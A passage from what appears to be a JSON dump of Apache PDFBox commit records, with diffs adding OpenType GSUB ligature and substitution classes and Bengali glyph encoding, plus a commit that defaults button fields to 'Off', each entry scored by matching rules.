- "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.gsub;", - "+", - "+/**", - "+ * This class is a part of the GSUB \u00e2\u0080\u0094 Glyph", - "+ * Substitution Table system of tables in the Open Type Font specs. This is a part of the LookupType", - "+ * 4: Ligature Substitution Subtable. It specifically models the LigatureSet table:", - "+ * All ligatures beginning with the same glyph.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class LigatureSetTable", - "+{", - "+ private final int ligatureCount;", - "+ private final LigatureTable[] ligatureTables;", - "+", - "+ public LigatureSetTable(int ligatureCount, LigatureTable[] ligatureTables)", - "+ {", - "+ this.ligatureCount = ligatureCount;", - "+ this.ligatureTables = ligatureTables;", - "+ }", - "+", - "+ public int getLigatureCount()", - "+ {", - "+ return ligatureCount;", - "+ }", - "+", - "+ public LigatureTable[] getLigatureTables()", - "+ {", - "+ return ligatureTables;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"%s[ligatureCount=%d]\", LigatureSetTable.class.getSimpleName(),", - "+ ligatureCount);", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureTable.java", - "new file mode 100644", - "index 000000000..34607ca9e", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureTable.java", - "@@ -0,0 +1,65 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.gsub;", - "+", - "+/**", - "+ * This class is a part of the GSUB \u00e2\u0080\u0094 Glyph", - "+ * Substitution Table system of tables in the Open Type Font specs. This is a part of the LookupType", - "+ * 4: Ligature Substitution Subtable. It specifically models the", - "+ * Ligature", - "+ * table: Glyph components for one ligature.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class LigatureTable", - "+{", - "+ private final int ligatureGlyph;", - "+ private final int componentCount;", - "+ private final int[] componentGlyphIDs;", - "+", - "+ public LigatureTable(int ligatureGlyph, int componentCount, int[] componentGlyphIDs)", - "+ {", - "+ this.ligatureGlyph = ligatureGlyph;", - "+ this.componentCount = componentCount;", - "+ this.componentGlyphIDs = componentGlyphIDs;", - "+ }", - "+", - "+ public int getLigatureGlyph()", - "+ {", - "+ return ligatureGlyph;", - "+ }", - "+", - "+ public int getComponentCount()", - "+ {", - "+ return componentCount;", - "+ }", - "+", - "+ public int[] getComponentGlyphIDs()", - "+ {", - "+ return componentGlyphIDs;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"%s[ligatureGlyph=%d, componentCount=%d]\",", - "+ LigatureTable.class.getSimpleName(), ligatureGlyph, componentCount);", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeLigatureSubstitutionSubstFormat1.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeLigatureSubstitutionSubstFormat1.java", - "new file mode 100644", - "index 000000000..8a776b048", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeLigatureSubstitutionSubstFormat1.java", - "@@ -0,0 +1,62 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.gsub;", - "+", - "+import org.apache.fontbox.ttf.table.common.CoverageTable;", - "+import org.apache.fontbox.ttf.table.common.LookupSubTable;", - "+", - "+/**", - "+ * This class is a part of the GSUB \u00e2\u0080\u0094 Glyph", - "+ * Substitution Table system of tables in the Open Type Font specs. This is a part of the LookupType", - "+ * 4: Ligature Substitution Subtable. It specifically models the", - "+ * Ligature", - "+ * Substitution Format 1.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class LookupTypeLigatureSubstitutionSubstFormat1 extends LookupSubTable", - "+{", - "+ private final LigatureSetTable[] ligatureSetTables;", - "+", - "+ public LookupTypeLigatureSubstitutionSubstFormat1(int substFormat, CoverageTable coverageTable,", - "+ LigatureSetTable[] ligatureSetTables)", - "+ {", - "+ super(substFormat, coverageTable);", - "+ this.ligatureSetTables = ligatureSetTables;", - "+ }", - "+", - "+ @Override", - "+ public int doSubstitution(int gid, int coverageIndex)", - "+ {", - "+ throw new UnsupportedOperationException();", - "+ }", - "+", - "+ public LigatureSetTable[] getLigatureSetTables()", - "+ {", - "+ return ligatureSetTables;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"%s[substFormat=%d]\",", - "+ LookupTypeLigatureSubstitutionSubstFormat1.class.getSimpleName(), getSubstFormat());", - "+ }", - "+}", - "\\ No newline at end of file", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat1.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat1.java", - "new file mode 100644", - "index 000000000..b7bfdeec6", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat1.java", - "@@ -0,0 +1,62 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.gsub;", - "+", - "+import org.apache.fontbox.ttf.table.common.CoverageTable;", - "+import org.apache.fontbox.ttf.table.common.LookupSubTable;", - "+", - "+/**", - "+ * This class is a part of the GSUB \u00e2\u0080\u0094 Glyph", - "+ * Substitution Table system of tables in the Open Type Font specs. This is a part of the LookupType", - "+ * 1: Single Substitution Subtable. It specifically models the", - "+ * Single", - "+ * Substitution Format 1.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class LookupTypeSingleSubstFormat1 extends LookupSubTable", - "+{", - "+ private final short deltaGlyphID;", - "+", - "+ public LookupTypeSingleSubstFormat1(int substFormat, CoverageTable coverageTable,", - "+ short deltaGlyphID)", - "+ {", - "+ super(substFormat, coverageTable);", - "+ this.deltaGlyphID = deltaGlyphID;", - "+ }", - "+", - "+ @Override", - "+ public int doSubstitution(int gid, int coverageIndex)", - "+ {", - "+ return coverageIndex < 0 ? gid : gid + deltaGlyphID;", - "+ }", - "+", - "+ public short getDeltaGlyphID()", - "+ {", - "+ return deltaGlyphID;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(\"LookupTypeSingleSubstFormat1[substFormat=%d,deltaGlyphID=%d]\",", - "+ getSubstFormat(), deltaGlyphID);", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat2.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat2.java", - "new file mode 100644", - "index 000000000..38841ec7f", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat2.java", - "@@ -0,0 +1,65 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.table.gsub;", - "+", - "+import java.util.Arrays;", - "+", - "+import org.apache.fontbox.ttf.table.common.CoverageTable;", - "+import org.apache.fontbox.ttf.table.common.LookupSubTable;", - "+", - "+/**", - "+ * This class is a part of the GSUB \u00e2\u0080\u0094 Glyph", - "+ * Substitution Table system of tables in the Open Type Font specs. This is a part of the LookupType", - "+ * 1: Single Substitution Subtable. It specifically models the", - "+ * Single", - "+ * Substitution Format 2.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class LookupTypeSingleSubstFormat2 extends LookupSubTable", - "+{", - "+ private final int[] substituteGlyphIDs;", - "+", - "+ public LookupTypeSingleSubstFormat2(int substFormat, CoverageTable coverageTable,", - "+ int[] substituteGlyphIDs)", - "+ {", - "+ super(substFormat, coverageTable);", - "+ this.substituteGlyphIDs = substituteGlyphIDs;", - "+ }", - "+", - "+ @Override", - "+ public int doSubstitution(int gid, int coverageIndex)", - "+ {", - "+ return coverageIndex < 0 ? gid : substituteGlyphIDs[coverageIndex];", - "+ }", - "+", - "+ public int[] getSubstituteGlyphIDs()", - "+ {", - "+ return substituteGlyphIDs;", - "+ }", - "+", - "+ @Override", - "+ public String toString()", - "+ {", - "+ return String.format(", - "+ \"LookupTypeSingleSubstFormat2[substFormat=%d,substituteGlyphIDs=%s]\",", - "+ getSubstFormat(), Arrays.toString(substituteGlyphIDs));", - "+ }", - "+}", - "\\ No newline at end of file", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/package.html b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/package.html", - "new file mode 100644", - "index 000000000..749617e1d", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/package.html", - "@@ -0,0 +1,26 @@", - "+", - "+", - "+", - "+", - "+", - "+", - "+", - "+This package contains the highly obfuscated GSUB, aka, Glyph Substitution Table system of tables from the Open Type Font specs. ", - "+This package makes an honest attempt to closely model these highly obfuscated OTF Tables in the GSUB sub-category, in their raw glory, as close as possible to their original nonsensical forms, without any spite or bias.", - "+", - "+", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/package.html b/fontbox/src/main/java/org/apache/fontbox/ttf/table/package.html", - "new file mode 100644", - "index 000000000..026cc9984", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/package.html", - "@@ -0,0 +1,26 @@", - "+", - "+", - "+", - "+", - "+", - "+", - "+", - "+This package contains the highly obfuscated Font tables from the Open Type Font specs. ", - "+This package makes an honest attempt to closely model these highly obfuscated OTF Tables, in their raw glory, as close as possible to their original nonsensical forms, without any spite or bias.", - "+", - "+", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "index fb5acaf9a..de27a5f4c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "@@ -20,2 +20,3 @@ import java.awt.geom.AffineTransform;", - " import java.awt.geom.PathIterator;", - "+import java.io.ByteArrayOutputStream;", - " import java.io.Closeable;", - "@@ -23,3 +24,9 @@ import java.io.IOException;", - " import java.io.OutputStream;", - "+import java.util.ArrayList;", - "+import java.util.HashSet;", - "+import java.util.List;", - "+import java.util.Map;", - "+import java.util.Set;", - " import java.util.Stack;", - "+import java.util.regex.Pattern;", - "@@ -27,2 +34,6 @@ import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "+import org.apache.fontbox.ttf.CmapLookup;", - "+import org.apache.fontbox.ttf.gsub.CompoundCharacterTokenizer;", - "+import org.apache.fontbox.ttf.gsub.GsubWorker;", - "+import org.apache.fontbox.ttf.gsub.GsubWorkerForBengali;", - " import org.apache.pdfbox.contentstream.PDAbstractContentStream;", - "@@ -35,2 +46,3 @@ import org.apache.pdfbox.pdmodel.documentinterchange.markedcontent.PDPropertyLis", - " import org.apache.pdfbox.pdmodel.font.PDFont;", - "+import org.apache.pdfbox.pdmodel.font.PDType0Font;", - " import org.apache.pdfbox.pdmodel.graphics.PDXObject;", - "@@ -41,2 +53,3 @@ import org.apache.pdfbox.pdmodel.graphics.color.PDPattern;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDSeparation;", - "+import org.apache.pdfbox.pdmodel.graphics.form.PDFormXObject;", - " import org.apache.pdfbox.pdmodel.graphics.image.PDImageXObject;", - "@@ -314,2 +327,25 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - "+ byte[] encodedText = null;", - "+", - "+ if (font instanceof PDType0Font)", - "+ {", - "+ PDType0Font pdType0Font = (PDType0Font) font;", - "+ Map, Integer>> glyphSubstitutionMap = pdType0Font", - "+ .getGlyphSubstitutionMap();", - "+ if (!glyphSubstitutionMap.isEmpty())", - "+ {", - "+ Set glyphIds = new HashSet<>();", - "+ encodedText = encodeForGsub(glyphSubstitutionMap, glyphIds, pdType0Font, text);", - "+ if (pdType0Font.willBeSubset())", - "+ {", - "+ pdType0Font.addGlyphsToSubset(glyphIds);", - "+ }", - "+ }", - "+ }", - "+", - "+ if (encodedText == null)", - "+ {", - "+ encodedText = font.encode(text);", - "+ }", - "+", - " // Unicode code points to keep when subsetting", - "@@ -1142,2 +1178,64 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " }", - "+", - "+ private byte[] encodeForGsub(Map, Integer>> glyphSubstitutionMap,", - "+ Set glyphIds, PDType0Font font, String text) throws IOException", - "+ {", - "+", - "+ String spaceRegexPattern = \"\\\\s\";", - "+ Pattern spaceRegex = Pattern.compile(spaceRegexPattern);", - "+", - "+ // break the entire chunk of text into words by splitting it with space", - "+ List words = new CompoundCharacterTokenizer(\"\\\\s\").tokenize(text);", - "+", - "+ ByteArrayOutputStream out = new ByteArrayOutputStream();", - "+", - "+ for (String word : words)", - "+ {", - "+ if (spaceRegex.matcher(word).matches())", - "+ {", - "+ out.write(font.encode(word));", - "+ }", - "+ else", - "+ {", - "+ glyphIds.addAll(applyGSUBRules(out, font, glyphSubstitutionMap, word));", - "+ }", - "+ }", - "+", - "+ return out.toByteArray();", - "+ }", - "+", - "+ private List applyGSUBRules(ByteArrayOutputStream out, PDType0Font font,", - "+ Map, Integer>> glyphSubstitutionMap, String word)", - "+ throws IOException", - "+ {", - "+ List originalGlyphIds = new ArrayList<>();", - "+ CmapLookup cmapLookup = font.getCmapLookup();", - "+", - "+ // convert characters into glyphIds", - "+ for (char unicodeChar : word.toCharArray())", - "+ {", - "+ int glyphId = cmapLookup.getGlyphId(unicodeChar);", - "+ if (glyphId <= 0)", - "+ {", - "+ throw new IllegalStateException(", - "+ \"could not find the glyphId for the character: \" + unicodeChar);", - "+ }", - "+ originalGlyphIds.add(glyphId);", - "+ }", - "+", - "+ // TODO: figure out how to get this language-specific detail up here", - "+ GsubWorker gsubWorker = new GsubWorkerForBengali(cmapLookup, glyphSubstitutionMap);", - "+", - "+ List repositionedGlyphIds = gsubWorker.repositionGlyphs(originalGlyphIds);", - "+ List glyphIdsAfterGsub = gsubWorker.substituteGlyphs(repositionedGlyphIds);", - "+", - "+ for (Integer glyphId : glyphIdsAfterGsub)", - "+ {", - "+ out.write(font.encodeGlyphId(glyphId));", - "+ }", - "+", - "+ return glyphIdsAfterGsub;", - "+", - "+ }", - "+", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFont.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFont.java", - "index c6a6346cd..9fab519ff 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFont.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFont.java", - "@@ -371,2 +371,4 @@ public abstract class PDCIDFont implements COSObjectable, PDFontLike, PDVectorFo", - "+ public abstract byte[] encodeGlyphId(int glyphId);", - "+", - " /**", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType0.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType0.java", - "index 6600ec8d3..c4e224be3 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType0.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType0.java", - "@@ -404,2 +404,8 @@ public class PDCIDFontType0 extends PDCIDFont", - "+ @Override", - "+ public byte[] encodeGlyphId(int glyphId)", - "+ {", - "+ throw new UnsupportedOperationException();", - "+ }", - "+", - " @Override", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType2.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType2.java", - "index 859f118b8..675736d3e 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType2.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType2.java", - "@@ -363,4 +363,10 @@ public class PDCIDFontType2 extends PDCIDFont", - "+ return encodeGlyphId(cid);", - "+ }", - "+", - "+ @Override", - "+ public byte[] encodeGlyphId(int glyphId)", - "+ {", - " // CID is always 2-bytes (16-bit) for TrueType", - "- return new byte[] { (byte)(cid >> 8 & 0xff), (byte)(cid & 0xff) };", - "+ return new byte[] { (byte)(glyphId >> 8 & 0xff), (byte)(glyphId & 0xff) };", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "index 9fb8a615d..cd205868e 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "@@ -22,4 +22,8 @@ import java.io.IOException;", - " import java.io.InputStream;", - "+import java.util.Collections;", - " import java.util.HashSet;", - "+import java.util.List;", - "+import java.util.Map;", - " import java.util.Set;", - "+", - " import org.apache.commons.logging.Log;", - "@@ -27,2 +31,3 @@ import org.apache.commons.logging.LogFactory;", - " import org.apache.fontbox.cmap.CMap;", - "+import org.apache.fontbox.ttf.CmapLookup;", - " import org.apache.fontbox.ttf.TTFParser;", - "@@ -49,2 +54,4 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " private final Set noUnicode = new HashSet<>(); ", - "+ private final Map, Integer>> glyphSubstitutionMap;", - "+ private final CmapLookup cmapLookup;", - " private CMap cMap, cMapUCS2;", - "@@ -54,3 +61,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " private TrueTypeFont ttf;", - "- ", - "+", - " /**", - "@@ -64,2 +71,6 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " super(fontDictionary);", - "+", - "+ glyphSubstitutionMap = Collections.emptyMap();", - "+ cmapLookup = null;", - "+", - " COSBase base = dict.getDictionaryObject(COSName.DESCENDANT_FONTS);", - "@@ -94,2 +105,6 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " }", - "+", - "+ glyphSubstitutionMap = ttf.getGlyphSubstitutionMap();", - "+ cmapLookup = ttf.getUnicodeCmapLookup();", - "+", - " embedder = new PDCIDFontType2Embedder(document, dict, ttf, embedSubset, this, vertical);", - "@@ -234,2 +249,11 @@ public class PDType0Font extends PDFont implements PDVectorFont", - "+ public void addGlyphsToSubset(Set glyphIds)", - "+ {", - "+ if (!willBeSubset())", - "+ {", - "+ throw new IllegalStateException(\"This font was created with subsetting disabled\");", - "+ }", - "+ embedder.addGlyphIds(glyphIds);", - "+ }", - "+", - " @Override", - "@@ -576,2 +600,18 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " }", - "+", - "+ public Map, Integer>> getGlyphSubstitutionMap()", - "+ {", - "+ return glyphSubstitutionMap;", - "+ }", - "+", - "+ public byte[] encodeGlyphId(int glyphId)", - "+ {", - "+ return descendantFont.encodeGlyphId(glyphId);", - "+ }", - "+", - "+ public CmapLookup getCmapLookup()", - "+ {", - "+ return cmapLookup;", - "+ }", - "+", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/TrueTypeEmbedder.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/TrueTypeEmbedder.java", - "index 00ec05aab..e2cddee28 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/TrueTypeEmbedder.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/TrueTypeEmbedder.java", - "@@ -72,2 +72,4 @@ abstract class TrueTypeEmbedder implements Subsetter", - "+ private final Set allGlyphIds = new HashSet<>();", - "+", - " /**", - "@@ -285,2 +287,7 @@ abstract class TrueTypeEmbedder implements Subsetter", - "+ public void addGlyphIds(Set glyphIds)", - "+ {", - "+ allGlyphIds.addAll(glyphIds);", - "+ }", - "+", - " @Override", - "@@ -316,2 +323,7 @@ abstract class TrueTypeEmbedder implements Subsetter", - "+ if (!allGlyphIds.isEmpty())", - "+ {", - "+ subsetter.addGlyphIds(allGlyphIds);", - "+ }", - "+", - " // calculate deterministic tag based on the chosen subset" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png", - "fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitter.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitterRegexImpl.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/package.html", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat1.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat2.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureListTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureRecord.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysRecord.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupListTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupSubTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/RangeRecord.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptRecord.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/package.html", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureSetTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeLigatureSubstitutionSubstFormat1.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat1.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat2.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/package.html", - "fontbox/src/main/java/org/apache/fontbox/ttf/table/package.html", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFont.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType0.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType2.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/TrueTypeEmbedder.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "RELEVANT_WORDS_IN_MESSAGE", - "message": "The commit message contains some relevant words: PDF", - "relevance": 8 - }, - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "0d8596b921272a506cc656a9d283bf891c4b9f86", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531201468, - "hunks": 2, - "message": "PDFBOX-4256: use Off as the default value for a button field in case there is no value set -> see PDF spec git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1835515 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java", - "index 1a9fbb675..adcc1bb9b 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java", - "@@ -124,4 +124,6 @@ public abstract class PDButton extends PDTerminalField", - " /**", - "- * Returns the selected value. May be empty if NoToggleToOff is set but there is no value", - "- * selected.", - "+ * Returns the selected value.", - "+ * ", - "+ *

    Off is the default value which will also be returned if the", - "+ * value hasn't been set at all.", - " * ", - "@@ -138,3 +140,5 @@ public abstract class PDButton extends PDTerminalField", - " {", - "- return \"\";", - "+ // Off is the default value if there is nothing else set.", - "+ // See PDF Spec.", - "+ return \"Off\";", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4256": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "d9b25c8f54f2194d52d2d15bfac342136df38d01" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "RELEVANT_WORDS_IN_MESSAGE", - "message": "The commit message contains some relevant words: PDF", - "relevance": 8 - }, - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": 